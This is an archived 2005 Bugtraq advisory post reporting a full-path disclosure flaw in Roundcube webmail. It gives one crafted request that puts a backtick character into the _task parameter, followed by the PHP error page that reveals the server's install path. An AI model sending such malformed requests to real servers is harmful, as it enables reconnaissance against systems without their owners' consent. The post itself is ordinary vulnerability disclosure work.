[41715] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Fullpath disclosure in roundcube webmail

daemon@ATHENA.MIT.EDU (king_purba@yahoo.co.uk)
Sat Dec 17 18:14:19 2005

Date: 17 Dec 2005 19:43:19 -0000
Message-ID: <20051217194319.2310.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: king_purba@yahoo.co.uk
To: bugtraq@securityfocus.com

I try this request in my mailbox
http://xxxx.com/roundcube/?_auth=3Dcf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce=
&_task=3Dma%60il
then roundcube shows this warning

**PHP Error in /usr/local/apache2/htdocs/roundcube/index.php (301)*:* Invalid
request failed/file not found

The requested page was not found!
Please contact your server-administrator.

*Failed request:*
http://xxxx.com/roundcube/?_auth=3Dcf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce=
&_task=3Dma%60il


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[41715] in bugtraq

Fullpath disclosure in roundcube webmail

daemon@ATHENA.MIT.EDU (king_purba@yahoo.co.uk)Sat Dec 17 18:14:19 2005

daemon@ATHENA.MIT.EDU (king_purba@yahoo.co.uk)
Sat Dec 17 18:14:19 2005